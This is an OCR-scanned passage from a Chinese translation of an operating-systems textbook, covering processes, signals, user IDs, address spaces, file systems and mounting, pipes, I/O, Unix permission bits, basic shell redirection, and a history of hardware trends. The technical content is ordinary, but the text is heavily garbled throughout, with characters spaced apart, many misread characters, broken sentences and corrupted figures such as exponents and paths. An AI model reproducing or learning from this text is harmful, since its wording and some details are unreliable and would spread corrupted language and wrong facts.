键入 一 条 命令 要 求 编译 一 个 程序 。shell 必 须 先 创建 一 个 新 进程 来 执行 编 
译 程序 。 当 执行 编译 的 进程 结束 时 ， 它 执行 一 条 系统 调用 来 终止 目 己 。 





右 一 个 进程 能 够 创建 一 个 或 多 个 进程 〈 称 为 子 进程 ) ， 而 且 这 些 进 
程 又 可 以 创建 子 进程 ， 则 很 容易 得 到 进程 树 ， 如 图 1-13 所 示 。 合 作 完 成 
菏 些 作业 的 相关 进程 经 党 需要 彼此 通信 和 以便 同 步 它 们 的 行为 。 这 种 通信 


称 为 进程 间 通 信 (interprocess communication) ， 将 在 第 2 章 中 详细 讨 





论 。 


图 1-13 一 个 进程 树 。 进 程 A 创 建 两 个 子 进程 B 和 C， 进 程 B 创 建 三 个 
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其 他 可 用 的 进程 系统 调用 包括 : 申请 更 多 的 内 存 〈 或 释放 不 再 需要 
的 内 存 )、 等 待 一 个 子 进程 结束 、 用 为 一 个 程序 窗 盖 该 程序 等 。 





有 时， 需要 问 一 个 正在 运行 的 进程 传送 信息 ， 而 该 进程 并 没有 等 竺 
接收 信息 。 例 如 ， 一 个 进程 通过 网 络 同 另 一 人 台 机 器 上 的 进程 发 送 消 息 进 
行 通 信 。 为 了 保证 一 条 消息 或 消息 的 应 答 不 会 丢失 ， 发 送 者 要 求 它 所 在 
的 操作 系统 在 指定 的 耕 干 秒 后 给 一 个 通知 ， 这 样 如 果 对 方 尚未 收 到 确认 
消息 就 可 以 进行 重 发 。 在 设 定 该 定时 器 后 ， 程 序 可 以 继续 做 其 他 工作 。 











在 限定 的 秒 数 流逝 之 后 ， 操 作 系 统 向 该 进程 发 送 一 个 警告 信号 
(alarm signal) 。 此 信号 引起 该 进程 暂时 挂 起 ， 无 论 该 进程 正在 做 什 
么 ， 系 统 将 其 寄存 需 的 值 保存 到 堆栈 ， 并 开始 运行 一 个 特别 的 信号 处 理 
过 程 ， 比 如 重新 发 送 可 能 丢失 的 消 轧 。 这 些 信 号 是 软件 模拟 的 硬件 中 
断 ， 除 了 定时 需 到 期 乙 外 ， 该 信号 可 以 由 各 种 原因 产生 。 许 多 由 人 硬件 检 
测 出 来 的 陷阱 ， 诸 如 执行 了 非法 指令 或 使 用 了 无 效 地 址 等 ， 也 被 转换 成 


该 信号 并 交 给 这 个 进程 。 


系统 管理 器 授权 每 个 进程 使 用 一 个 给 定 的 UID 标 识 〈User 
IDentification) 。 每 个 被 启动 的 进程 都 有 一 个 启动 该 进程 的 用 户 UID。 
子 进程 拥有 与 父 进程 一 样 的 UID 。 用 户 可 以 是 某 个 组 的 成 员 ， 每 个 组 也 
有 一 个 GID 标 识 (Group IDentification ) 。 


在 UNIX 中 ， 有 一 个 UID 称 为 超级 用 户 (superuser) ， 具 有 特殊 的 权 
利 ， 可 以 违背 一 些 保护 规则 。 在 大 型 系统 中 ， 只 有 系统 管理 员 掌 握 着 成 
为 超级 用 户 的 密码 ， 但 是 许多 普通 用 户 (特别 是 学 生 〉 们 做 出 可 观 的 努 
力 试图 找 出 系统 的 缺陷 ， 从 而 使 他 们 不 用 密码 就 可 以 成 为 超级 用 户 。 








在 第 2 章 中 ， 我 们 将 讨论 进程 、 进 程 间 通信 以 及 有 关 的 内 容 。 


1.5.2 ”地 址 空间 


每 台 计 算 机 都 有 一 些 主 存 ， 用 来 保存 正在 执行 的 程序 。 在 非常 简单 
的 操作 系统 中 ， 内 存 中 一 次 只 能 有 一 个 程序 。 如 果 要 运行 第 二 个 程序 
第 一 个 程序 束 必 须 被 移出 内 存 ， 再 把 第 二 个 程序 装 入 内 存 。 


较 复 森 的 操作 系统 允许 在 内 存 中 同时 运行 多 道 程序 。 为 了 避免 它们 
彼此 互相 干扰 (包括 操作 系统 ) ， 需 要 有 茶 种 保护 机 制 。 虽然 这 种 机 制 
必然 是 硬件 形式 的 ， 但 是 它 由 操作 系统 掌控 。 





述 的 观 后 涉及 对 计算 机 主 存 的 绾 理 和 保护 。 男 一 种 不 同 的 但 是 同 
样 重要 并 与 存储 器 有 关 的 内 容 ， 是 管理 进程 的 地 址 空间 。 通 党 ， 每 个 进 
程 有 一 些 可 以 使 用 的 地 址 集合 ， 和 典型 值 从 0 开始 直到 茶 个 最 大 值 。 在 最 
简单 的 情形 下 进程 可 拥有 的 最 大 地 址 空间 小 于 主 存 。 在 这 种 方式 
下 ， 进 程 可 以 用 满 其 地 址 空间 ， 而 且 内 存 中 也 有 足够 的 空间 容纳 该 进 


程 。 











但 是 ， 在 许多 32 位 或 64 位 地 址 的 计算 机 中 ， 分 别 有 23 或 2% 字 节 的 
地 址 空间 。 如 果 一 个 进程 有 比 计算 机 拥有 的 主 存 还 大 的 地 址 空间 ， 而 且 
该 进程 希望 使 用 全 部 的 内 存 ， 那 怎么 办 呢 ? 在 早期 的 计算 机 中 ， 这 个 进 
程 只 好 承认 坏 运 气 了 。 现 在 ， 有 了 一 种 称 为 虚拟 内 存 的 技术 ， 正 如 前 面 
己 经 介绍 过 的 ， 操 作 系 统 可 以 把 部 分 地 址 空间 闭 入 主 存 ， 部 分 留 在 磁盘 





上 ， 并 且 在 需要 时 罕 梭 交换 它们 。 在 本 质 上 ， 操 作 系 统 创 建 了 一 个 地 址 
空间 的 抽象 ， 作 为 进程 可 以 引用 地 址 的 集合 。 该 地 址 空间 与 机 器 的 物理 
内 存 解 厢 ， 可 能 大 于 也 可 能 小 于 该 物理 空间 。 对 地 址 空间 和 物理 空间 的 
管理 组 成 了 操作 系统 功能 的 一 个 重要 部 分 ， 本 书 中 整个 第 3 章 都 与 这 个 


主题 有 关 o 


1.5.3 ”文件 


实际 上 ， 文 持 操 作 系统 的 另 一 个 关键 概念 是 文件 系统 。 如 前 所 述 ， 
操作 系统 的 一 项 主要 功能 是 隐藏 磁盘 和 其 他 WO 设备 的 细节 特性 ， 并 所 
供给 程序 员 一 个 展 好 、 清 晰 的 独立 于 设备 的 抽象 文件 模型 。 显 然 ， 创 建 
文件 、 删 除 文件 、 读 文件 和 写 文件 等 都 需要 系统 调用 。 在 文件 可 以 读 取 
之 前 ， 必 须 先 在 磁盘 上 定位 和 打开 文件 ， 在 文件 读 过 之 后 应 该 关闭 该 文 
件 ， 有 关 的 系统 调用 则 用 于 完成 这 类 操作 。 





为 了 提供 保存 文件 的 地 方 ， 大 多 数 操作 系统 文 持 目录 (directory) 
的 概念 ， 从 而 可 把 文件 分 类 成 组 。 比 如 ， 学 生 可 给 所 选 的 每 个 课程 创建 
一 个 目录 “〈 用 于 保存 该 读 程 所 需 的 程序 ) ， 男 设 一 个 目录 存放 电子 邮 
件 ， 再 有 一 个 目录 用 于 保存 万 维 网 主页 。 这 就 需要 系统 调用 创建 和 删除 
目录 、 将 已 有 的 文件 放 入 目录 中 、 从 目录 中 删除 文件 等 。 目 录 项 可 以 是 
文件 或 者 目录 ， 这 样 束 产生 了 层次 结构 一 一 文件 系统 ， 如 图 1-14 所 示 。 
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图 1-14 大 学 院 系 的 文件 系统 


进程 和 文件 层次 都 可 以 组 织 成 树 状 结构 ， 但 这 两 种 树 状 结构 有 不 少 
不 同 之 处 。 一 般 进 程 的 树 状 结构 层次 不 深 ( 很 少 超过 三 层 ) ， 而 文件 树 
状 结构 的 层次 第 第 多 达 四 层 、 五 层 或 更 多 层 。 进 程 树 层 次 结构 是 暂时 
的 ， 通 常 最 多 存在 几 分 钟 ， 而 目录 层次 则 可 能 存在 数 年 之 入 。 进 程 和 文 
件 在 所 有 权 及 保护 方面 也 是 有 区 别 的 。 典 型 地 ， 只 有 父 进程 能 控制 和 访 
问 子 进程 ， 而 在 文件 和 目录 中 通常 存在 一 种 机 制 ， 使 文件 所 有 者 之 外 的 
其 他 用 户 也 可 以 访问 该 文件 。 





























目录 层 结构 中 的 每 一 个 文件 都 可 以 通过 从 目录 的 顶部 ， 即 根 目录 


(root directory) 开始 的 路 径 名 (path name) 来 确定 。 绝 对 路 径 名 包含 
了 从 根 目 录 到 该 文件 的 所 有 目录 清单 ， 它 们 之 间 用 正 斜 线 隔 开 。 如 在 图 
1-14 中 ， 文 件 CS101 路 径 名 是 /FacultwProf.Brown/Courses/CS101。 最 开 
始 的 正 斜 线 表 示 这 是 从 根 目录 开始 的 绝对 路 径 。 顺 便 提 及 ， 在 MS-DOS 
和 Windows 中 ， 用 反 斜 线 O FENDE, BRITENE O), 
这 样 ， 上 面 给 出 的 文件 路 径 会 写 为 \Faculty\Prof.Brown\Courses\CS101。 
在 本 书 中 ， 我 们 一 般 使 用 路 径 的 UNIX 人 惯例 。 








在 实例 中 ， 每 个 进程 有 一 个 工作 目录 (working directory) ， 其 中 ， 
路 径 名 不 以 斜 线 开始 。 如 在 图 1-14 中 的 例子 ， 如 果 /Faculty/Prof.Brown 是 
工作 目录 ， 那 么 Courses/CS101 与 上 面 给 定 的 绝对 路 径 名 表示 的 是 同一 
个 文件 。 进 程 可 以 通过 使 用 系统 调用 指定 新 的 工作 目录 ， 从 而 变更 其 工 
作 目 录 。 








在 读 写 文件 之 前 ， 首 先 要 打开 文件 ， 检 碍 其 访问 权限 。 知 权限 许 
可 ， 系 统 将 返回 一 个 小 整数 ， 称 作文 件 描述 符 (file descriptor) ， 供 后 
续 操 作 使 用 。 知 禁止 访问 ， 系 统 则 返回 一 个 错误 人 码 。 


在 UNIX 中 的 另 一 个 重要 概念 是 安装 文件 系统 。 几 乎 所 有 的 个 人 计 
算 机 都 有 一 个 或 多 个 光盘 驱动 器 ， 可 以 插入 CD-ROM 和 DVD。 它 们 几乎 
都 有 USB 接 口 ， 可 以 插入 USB 存 储 棒 《实际 是 固态 磁盘 驱动 器 ) NT 
提供 一 个 出 色 的 方式 处 理 可 移动 介质 ，UNIX 人 允许 把 在 CD-ROM 或 DVD 
上 的 文件 系统 接 入 到 主 文件 树 上 。 考 虑 图 1-15a 的 情形 。 在 mount 调 用 之 


前 ， 根 文件 系统 在 硬盘 上 ， 而 第 二 个 文件 系统 在 CD-ROM 上 ， 它 们 是 分 
离 的 和 无 关 的 。 


a) b 


图 1-15 在 安装 前 ， 了 驱动 器 0 上 的 文件 不 可 访问 ; 中) 在 安装 后 ， 它 们 
成 了 文件 层次 的 一 部 分 


然而 ， 不 能 使 用 在 CD-ROM 上 的 文件 系统 ， 因 为 上 面 没 有 可 指定 的 
路 径 。UNIX 不 允许 在 路 径 前 面 加 上 驱动 器 名 称 或 代码 ， 那 样 做 就 完全 
成 了 设备 相关 类 型 了 ， 这 是 操作 系统 应 该 消除 的 。 代 蔡 的 方法 是 ， 
mount 系 统 调 用 允许 把 在 CD-ROM 上 的 文件 系统 连接 到 程序 所 希望 的 根 
文件 系统 上 。 在 图 1-15b 中 ，CD-ROM 上 的 文件 系统 安装 到 了 目录 b 上 ， 
这 样 就 允许 访问 文件 bx 以 及 /bl/y。 如 果 当 CD-ROM 安 装 好 ， 目 录 b 中 有 
任何 不 能 访问 的 文件 ， 则 是 因为 b 指 向 了 CD-ROM 的 根 目 录 。《 在 开始 
时 ， 不 能 访问 这 些 文件 似乎 并 不 是 一 个 严重 问题 : 文件 系统 几乎 总 是 安 
装 在 空 目 录 上 。) 如 果 系 统 有 多 个 硬盘 ， 它 们 也 可 以 都 安装 在 单个 树 
ah 





在 UNIX 中 ， 男 一 个 重要 的 概念 是 特殊 文件 (special file) 。 提 供 特 
殊 文 件 是 为 了 使 WO 设备 看 起 来 像 文 件 一 般 。 这 样 ， 束 像 使 用 系统 调用 
读 写 文件 一 样 ，L/O 设 备 也 可 通过 同样 的 系统 调用 进行 读 写 。 有 两 类 特 
殊 文 件 ， 块 特殊 文件 (block special file〉 和 字符 特殊 文件 (character 
special file》。 块 特殊 文件 指 那 些 由 可 随机 存 取 的 块 组 成 的 设备 ， 如 磁 
盘 等 。 比 如 打开 一 个 块 特殊 文件 ， 然 后 读 第 4 块 ， 程 序 可 以 直接 访问 设 
备 的 第 4 块 而 不 必 考 虑 存放 该 文件 的 文件 系统 结构 。 类 似 地 ， 字 符 特 殊 
文件 用 于 打印 机 、 调 制 解 调 器 和 其 他 接收 或 输出 字符 注 的 设备 。 按 照 惯 
例 ， 特 殊 文件 保存 在 /dev 目 录 中 。 例 如 ，/dev/lp 是 打印 机 (曾经 称 为 行 
式 打印 机 ) 。 











在 本 节 中 讨论 的 最 后 一 个 特性 既 与 进程 有 关 也 与 文件 有 关 : 管道 
管道 (pipe) 古 一 种 虚 文 件 ， 它 可 连接 两 个 进程 ， 如 图 1-16 所 示 。 如 宋 
进程 A 和 B 和 希望 通过 管道 对 话 ， 它 们 必须 提前 设置 该 管道 。 当 进程 A 想 对 
进程 B 发 送 数据 时 ， 它 把 数据 写 到 管道 上 ， 仿 佛 管道 就 是 输出 文件 一 
样 。 进 程 B 可 以 通过 读 该 管道 而 得 到 数据 ， 仿 佛 该 管道 就 是 一 个 输入 文 
件 一 样 。 这 样 ， 在 UNIX 中 两 个 进程 之 间 的 通信 和 就 很 类 似 于 普通 文件 的 
读 写 了 。 更 为 强大 的 是 ， 若 进程 要 想 发 现 它 所 写 入 的 输出 文件 不 是 真正 
的 文件 而 是 管道 ， 则 需要 使 用 特殊 的 系统 调用 。 文 件 系 统 是 非常 重要 
的 。 我 们 将 在 第 6 章 ， 以 及 第 10 章 和 第 11 章 中 具体 讨论 它们 。 














图 1-16 由 管道 连接 的 两 个 进程 


1.5.4 输入 /输出 


所 有 的 计算 机 都 有 用 来 获取 输入 和 产生 输出 的 物理 设备 。 毕 竟 ， 如 
果 用 户 不 能 告诉 计算 机 该 做 什么 ， 而 在 计算 机 完成 了 所 要 求 的 工作 之 后 
竟 不 能 得 到 结果 ， 那 么 计算 机 还 有 什么 用 处 呢 ? 有 各 种 类 型 的 输入 和 输 
出 设备 ， 包 括 键盘 、 显 示 嚣 、 打 印 机 等 。 对 这 些 设备 的 管理 全 然 依靠 操 
作 系 统 。 


所 以 ， 每 个 操作 系统 都 有 管理 其 IO 设备 的 MO 子 系统 。 某 些 IO 软 件 
是 设备 独立 的 ， 即 这 些 IO 软 件 部 分 可 以 同样 应 用 于 许多 或 者 全 部 的 IO 
设备 上 。LIO 软 件 的 其 他 部 分 ， 如 设备 驱动 程序 ， 是 专门 为 特定 的 MO 设 
备 设 计 的 。 在 第 5 章 中 ， 我 们 将 讨论 IO 软件 。 


1.5.5 ”保护 











计算 机 中 有 大 量 的 信息 ， 用 户 经 常 希望 对 其 进行 保护 ， 并 保守 秘 
密 。 这 些 信 息 可 包括 电子 邮件 、 商 业 计 划 、 退 税 等 诸多 内 容 。 管 理 系统 
的 安全 性 完全 依靠 操作 系统 ， 例 如 ， 文 件 仅 供 授权 用 户 访问 。 


作为 一 个 简单 的 例子 ， 以 便 读 者 对 如 何 实现 安全 有 一 个 概念 ， 请 考 
察 UNIX。UNIX 操 作 系 统 通 过 对 每 个 文件 赋予 一 个 9 位 的 三 进 制 保 护 代 
码 ， 对 UNIX 中 的 文件 实现 保护 。 该 保护 代码 有 三 个 3 位 字段 ， 一 个 用 于 
所 有 者 ， 一 个 用 于 所 有 者 同 组 (用 户 被 系统 管理 员 划 分 成 组 〉 中 的 其 他 
成 员 ， 而 另 一 个 用 于 其 他 人 。 每 个 字段 中 有 一 位 用 于 读 访 问 ， 一 位 用 于 
写 访 问 ， 一 位 用 于 执行 访问 。 这 些 位 就 是 知名 的 rwx 位 。 例 如 ， 保 护 代 
码 rwxr-x--x 的 含义 是 所 有 者 可 以 读 、 写 或 执行 该 文件 ， 其 他 的 组 成 员 可 
以 读 或 执行 《但 不 能 写 ) 该 文件 ， 而 其 他 人 可 以 执行 (但 不 能 读 和 写 ) 
该 文件 。 对 一 个 目录 而 言 ，x 的 含义 是 允许 查询 。 一 条 短 横 线 的 含义 
是 ， 不 存在 对 应 的 许可 。 




















除了 文件 保护 之 外 ， 还 有 很 多 有 关 安 全 的 问题 存在 。 保 护 系统 不 被 
人 类 或 非 人 类 《如 病毒 ) 入 侵 ， 则 是 其 中 之 一 。 我 们 将 在 第 9 半 中 研究 
各 种 安全 性 问题 。 





1.5.6 shell 


操作 系统 是 进行 系统 调用 的 代码 。 编 辑 器 、 编 译 器 、 汇 编程 序 、 链 
接 程序 以 及 命令 解释 器 等 ， 尺 管 非常 重要 ， 也 非常 有 用 ， 但 是 它们 确实 
不 是 操作 系统 的 组 成 部 分 。 为 了 避免 可 能 发 生 的 混淆 ， 本 节 将 大 致 介绍 
一 下 UNIX 的 命令 解释 器 ， 称 为 shell。 尽 管 shell 本 身 不 是 操作 系统 的 一 
部 分 ， 但 它 体 现 了 许多 操作 系统 的 特性 ， 并 很 好 地 说 明了 系统 调用 的 具 
体 用 法 。shell 同 时 也 是 终端 用 户 与 操作 系统 之 间 的 界面 ， 除 非 用 户 使 用 
的 是 一 个 图 形 用 户 界 面 。 有 许多 种 类 的 shell， 如 sh、csh、ksh 以 及 bash 
等 。 它 们 全 部 支持 下 面 所 介绍 的 功能 ， 这 些 功 能 可 追溯 到 早期 的 
shell ( 即 sh) 。 


用 户 登 录 时 ， 同 时 启动 了 一 个 shell。 它 以 终端 作为 标准 输入 和 标准 
和 输出。 首先 显示 提示 符 (prompt) ， 它 可 能 是 一 个 美元 符号 ， 提 示 用 户 


shell 正 在 等 竺 接收 命令 。 假 如 用 户 键入 











date 





于 是 shell 创 建 一 个 子 进 程 ， 并 运行 date 程 序 作为 子 进程 。 在 该 子 进 
程 运行 期 间 ，shell 等 待 它 结束 。 在 子 进程 结束 后 ，shell 再 次 显示 提示 


符 ， 并 等 竺 下 一 行 输入 。 





用 户 可 以 将 标准 输出 重 定 癌 到 一 个 文件 ， 如 键入 : 





date>file 








同样 地 ， 也 可 以 将 标准 输入 重 定 同 ， 如 : 





sort<filel>file2 














该 命令 调用 sort 程 序 ， 从 flel 中 取得 输入 ， 输 出 送 到 file2。 





可 以 将 一 个 程序 的 输出 通过 省 道 作 为 为 一 程序 的 输入 ， 因 此 有 





cat filel file2 file3|sort>/dev/lp 

















所 调用 的 cat 程 序 将 这 三 个 文件 合并 ， 其 结果 送出 到 sort 程 序 并 按 字 
典 排 序 。sort 的 输出 又 被 重 定 同 到 文件 /dewip 中 ， 显 然 ， 这 是 打印 机 。 


如 果 用 户 在 命令 后 加 上 一 个 “&” 符 号 ， 则 shell 将 不 等 待 其 结束 ， 而 
直接 显示 出 提示 符 。 所 以 








cat filel file2 file3|sort>/dev/lp& 

















将 局 动 sort 程 序 作 为 后 台 任 务 执行 ， 这 样 就 可 以 允许 用 户 继续 工 
作 ， 而 sort 命 令 也 继续 进行 。shell 还 有 许多 其 他 有 用 的 特性 ， 由 于 篇 幅 
有 限 而 不 能 在 这 里 讨论 。 有 许多 UNIX 的 书籍 具体 地 讨论 了 shell (fil 
il, KernighanfllPike, 1984; KochanfllWood, 1990; Medinets， 


1999，Newham 和 Rosenblatt，1998; Robbins, 1999) 。 


现在 ， 许 多 个 人 计算 机 使 用 GUI。 事 实 上 ，GUI 与 shell 类 似 ，GUI 
只 是 一 个 运行 在 操作 系统 顶部 的 程序 。 在 Linux 系 统 中 ， 这 个 事实 更 加 
明显 ， 因 为 用 户 ( 人 至少 ) 可 以 在 两 个 GUI 中 选择 一 个 : Gnome 和 KDE， 
或 者 干脆 不 用 《使 用 XI11 上 的 终端 视窗 ) 。 在 Windows 中 也 有 可 能 用 不 
同 的 程序 代替 标准 的 GUI 桌面 (Windows Explorer) ， 这 可 以 通过 修改 
注册 表 中 的 某 些 数值 实现 ， 不 过 极 少 有 人 这 样 做 。 


1.5.7 “个体 重复 系统 发 育 


在 达尔 文 的 《物种 起 源 》 (On the Origin of the Species) 一 书 出 版 
之 后 ， 德 国 动物 学 家 Ernst Haeckel 论 述 了 “个 体重 复 系统 发 
育 ”(ontogeny recapitulates phylogeny) 。 他 这 句 话 的 含义 是 ， 一 个 个 体 
重复 着 物种 的 演化 过 程 。 换 名 话说 ， 在 一 个 卵子 受精 之 后 ， 成 为 人 体 之 
前 ， 这 个 卵子 要 经 过 是 鱼 、 是 猪 等 阶段 。 现 代 生 物 学 家 认为 这 是 一 种 粗 


略 的 简化 ， 不 过 这 种 观点 仍旧 包含 了 真理 的 内 核 部 分 。 


在 计算 机 的 历史 中 ， 类 似 情形 依稀 发 生 。 每 个 新 物种 (大 型 机 、 小 
型 计算 机 、 个 人 计算 机 、 和 区 上 、 饼 入 式 计 算 机 、 智 能 卡 等 ) ， 无 论 是 硬 
件 还 是 软件 ， 似 乎 都 要 经 过 它们 前 蕴 的 发 展 阶段 。 计 算 机 科学 和 许多 领 
域 一 样 ， 主 要 是 由 技术 驱动 的 。 古 罗马 人 缺少 汽车 的 原因 不 是 因为 他 们 
非常 喜欢 步行 ， 是 因为 他 们 不 知道 如 何 造 汽车 。 个 人 计算 机 的 存在 ， 不 
古 因 为 成 百 万 的 人 们 有 几 个 世纪 被 压抑 的 拥有 一 合计 算 机 的 愿望 ， 而 古 
因为 现在 可 以 很 便宜 地 制造 它们 。 我 们 常常 筷 了 技术 是 如 何 影 响 着 我 们 
对 各 种 系统 的 观点 ， 所 以 有 时 值得 再 仔细 考虑 它们 。 














特别 地 ， 技 术 的 变化 会 导致 某 些 思想 过 时 并 迅速 消失 ， 这 种 情形 经 
常 发 生 。 但 是 ， 技 术 的 另 一 种 变化 还 可 能 再 次 复活 某 些 思想 。 在 技术 的 
变化 影响 了 某 个 系统 不 同 部 分 之 间 的 相对 性 能 时 ， 情 况 就 会 是 这 样 。 例 











如 ， 当 CPU 远 快 于 存储 器 时 ， 为 了 加 速 “ 慢 速 ” 的 存储 器 ， 高 速 缓存 是 很 
重要 的 。 茶 一 天 ， 如 采 新 的 存储 器 技术 使 得 存储 器 远 快 于 CPU 时 ， 高 速 
缓存 就 会 消失 。 而 如 果 新 的 CPU 技术 叉 使 CPU 远 快 于 存储 右 时 ， 高 速 绥 

存 就 会 再 次 出 现 。 在 生物 学 上 ， 消 失 是 永远 的 ， 但 是 在 计算 机 科学 中 ， 
这 一 种 消失 有 时 不 过 只 有 几 年 时 间 。 








在 本 书 中 ， 和 暂时 消失 的 结果 会 造成 我 们 有 时 需要 反复 考 硅 一 些 “ 过 
时 ”的 概念 ， 即 那些 在 当代 技术 中 并 不 理想 的 思想 。 而 技术 的 变化 会 把 
一 些 “ 过 时 概念 ”市 回来 。 正 由 于 此 ， 更 重要 的 是 要 理解 为 什么 一 个 概念 
过 时 ， 而 什么 样 环境 的 变化 义 会 局 用 “过 时 概念 ”。 





为 了 把 这 个 观 扣 叙述 得 更 透彻 ， 我 们 考虑 一 些 例 子 。 早 期 计算 机 及 
用 了 硬 连 线 指令 集 。 这 种 指令 可 由 硬件 直接 执行 ， 且 不 能 改变 。 然 后 出 
现 了 微 程序 设计 (首先 在 IBM 360 上 大 规模 引入 ) ， 其 中 的 解释 器 执行 
软件 中 的 指令 。 于 是 便 连 线 执行 过 时 了， 因为 不 够 灵活 。 接 着 发 明了 
RISC 计 算 机 ， 微 程序 设计 《 即 解释 执行 ) 过 时 了 ， 这 是 因为 直接 执行 
更 快 。 而 在 通过 Internet 发 送 并 且 到 达 时 才 解 释 的 Java 小 程序 形式 中 ， 我 
们 又 看 到 了 解释 执行 的 复苏 。 执 行 速 度 并 不 总 是 关键 因素 ， 但 由 于 网 络 
的 时 间 延 迟 是 如 此 之 大 ， 以 至 于 筷 成 了 主要 因素 。 这 样 ， 钟 摆 在 直接 执 
行 和 解释 之 间 已 经 晃动 了 好 几 个 周期 ， 也 许 在 未 来 还 会 再 次 晃动 。 


























1. 大 型 内 存 


现在 来 分 析 硬 件 的 某 些 历史 发 展 过程 ， 并 看 看 硬件 是 如 何 重复 地 影 
啊 软 件 的 。 第 一 代 大 型 机 内 存 有 限 。 在 1959 年 至 1964 年 之 间 ， 称 为 “ 山 
寨 王 的 IBM 7090 或 7094 满 载 也 只 有 128KB 多 的 内 存 。 该 机 器 多 数 用 汇 
编 语言 编程 ， 为 了 市 省 内 存 ， 其 操作 系统 用 汇编 语言 编写 。 














随 着 时 代 的 前 进 ， 在 汇编 语言 宣告 过 时 时 ，FORTRAN 和 COBOL 一 
类 语言 的 编译 器 已 经 足够 好 了 。 但 是 在 第 一 个 商用 小 型 计算 机 〈PDP- 
1) 发 布 时 ， 却 只 有 4096 个 18 位 字 的 内 存 ， 而 且 令 人 吃惊 的 是 ， 汇 编 语 
言 又 回来 了 。 最 终 ， 小 型 计算 机 获得 了 更 多 的 内 存 ， 而 且 高 级 语言 也 在 
小 型 机 上 盛行 起 来 。 














在 20 世 纪 80 年 代 早期 ， 微 型 计算 机 出 现时 ， 第 一 批 机 器 只 有 4KB 内 
存 ， 汇 编 语言 又 复活 了 。 抠 入 式 计 算 机 经 常 使 用 和 微型 计算 机 一 样 的 
CPU 芯片 〈8080、Z80、 后 来 的 8086) 而 且 一 开始 也 使 用 汇编 编程 。 现 
在 ， 它 们 的 后 代 ， 个 人 计算 机 拥有 大 量 的 内 存 ， 使 用 C、C++、Java 和 
其 他 高 级 语言 编程 。 智 能 卡 正 在 走 着 类 似 的 发 展 道路 ， 而 且 除 了 确定 的 
大 小 之 外 ， 智 能 卡通 常 使 用 Java 解 释 器 ， 解 释 执 行 Java 程 序 ， 而 不 是 将 
Java 编 译 成 为 智能 卡 的 机 器 语言 。 








2. 保 护 人 硬件 


早期 的 [BM 7090/7094 一 类 大 型 机 ， 没 有 保护 硬件， 所 以 这 些 机 器 
一 次 只 运行 一 个 程序 。 一 个 有 问题 的 程序 就 可 能 毁 掉 操作 系统 ， 并 且 很 


容易 使 机 器 朋 溃 。 在 IBM 360 发 布 时 ， 提 供 了 保护 硬件 的 原型 ， 这 些 机 
器 可 以 在 内 存 中 同时 保持 和 匣 干 程序 ， 并 让 它们 轮流 运行 〈 多 道 程序 处 
。 于 是 单 道 程序 处 理 宣告 过 时 。 





至 少 是 到 了 第 一 个 小 型 计算 机 出 现 
多 道 程 序 处 理 也 不 可 能 有 。 尽 管 PDP-1 和 PDP-8 没 有 保护 硬件 ， 但 是 
PDP-11 型 机 器 有 了 保护 便 件 ， 这 一 特点 导致 了 多 道 程 序 处 理 的 应 用 ， 并 
且 最 终 导致 UNIX 操 作 系 统 的 诞生 。 





以 





在 建造 第 一 代 微 型 计算 机 时 ， 使 用 了 Intel 8080 CPU 心 片 ， 但 是 没 
有 保护 硬件 ， 这 样 我 们 又 回 到 了 单 道 程序 处 理 。 直 到 Intel 80286 才 增加 
了 保护 硬件 ， 于 是 有 了 多 道 程序 处 理 。 直 到 现在 ， 许 多 舱 入 式 系统 仍旧 
没有 保护 硬件 ， 而 且 只 运行 单个 程序 。 


现在 来 考察 操作 系统 。 第 一 代 大 型 机 原本 没有 保护 硬件 ， 也 不 文 持 
多 道 程序 处 理 ， 所 以 这 些 机 器 只 运行 简单 的 操作 系统 ， 一 次 手工 只 能 装 
载 一 个 程序 。 后 来 ， 大 型 机 有 了 保护 硬件 ， 操 作 系 统 可 以 同时 文 持 运行 
多 个 程序 ， 接 独 系 统 拥 有 了 全 功能 的 分 时 能 


在 小 型 计算 机 刚 出 现时 ， 也 没有 保护 人 硬件， 一 次 只 运行 一 个 手工 装 
载 的 程序 。 逐 渐 地 ， 小 型 机 有 了 保护 硬件 ， 有 了 同时 运行 两 个 或 更 多 程 
序 的 能 力 。 第 一 代 微 型 计算 机 也 只 有 一 次 运行 一 个 程序 的 能 力 ， 但 是 随 
后 具有 了 多 道 程序 的 能 力 。 掌 上 计算 机 和 智能 卡 也 走 厦 类 似 的 发 展 之 








路 。 


在 所 有 这 些 案 例 中 ， 软 件 的 发 展 是 受制 于 技术 的 。 例 如 ， 第 一 代 微 
型 计算 机 有 约 4KB 内 存 ， 没 有 保护 人 硬件。 高 级 语言 和 多 道 程序 处 理 对 于 
这 种 小 系统 而 言 ， 无 法 获得 支持 。 随 着 微型 计算 机 演化 成 为 现代 个 人 计 
算 机 ， 拥 有 了 必要 的 硬件 ， 从 而 有 了 必须 的 软件 处 理 以 文 持 多 种 先进 的 
功能 。 这 种 演化 过 程 看 来 还 要 继续 多 年 。 其 他 的 领域 也 有 类 似 的 这 种 轮 
回 现 象 ， 但 是 在 计算 机 行业 中 ， 这 种 轮回 现象 似乎 变化 得 更 快 。 


3. 便 盘 


早期 大 型 机 主要 是 基于 磁带 的 。 机 器 从 磁带 上 读 入 程序 、 编 译 、 运 

， 并 把 结果 写 到 另 一 个 磁带 上 。 那 时 没有 磁盘 也 没有 文件 系统 的 概 
。 在 IBM 于 1956 年 引入 第 一 个 磁盘 一 一 RAMAC (RAndoM ACcess ) 
之 后 ， 事 情 开 始 变化 。 这 个 磁盘 占据 4 平方 米 空 间 ， 可 以 存储 5 百 万 7 位 
长 的 字符 ， 这 足够 存储 一 张 中 等 分 辨 率 的 数字 照片 。 但 是 其 年 租金 高 ) 
35 000 美 元 ， 比 存储 占据 同样 空间 数量 的 胶卷 还 要 贵 。 不 过 这 个 磁盘 的 
价格 终于 还 是 下 降 了 ， 并 开始 出 现 了 原始 的 文件 系统 。 


| 
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拥有 这 些 新 技术 的 典型 机 器 是 CDC 6600， 该 机 器 于 1964 年 发 布 ， 
在 多 年 之 内 始终 是 世界 上 最 快 的 计算 机 。 用 户 可 以 通过 指定 名 称 的 方式 
创建 所 谓 “ 永 久 文件 ”， 希 望 这 个 名 称 还 没有 被 别人 使 用 ， 比 如 “data” 就 
是 一 个 适合 于 文件 的 名 称 。 这 个 系统 使 用 单 层 目录 。 后 来 在 大 型 机 上 开 


发 出 了 复杂 的 多 层 文件 系统 ，MULTICS 文 件 系 统 可 以 算是 多 层 文件 系 
统 的 顶峰 。 








接着 小 型 计算 机 投入 使 用 ， 该 机 型 最 后 也 有 了 硬盘 。1970 年 在 PDP- 
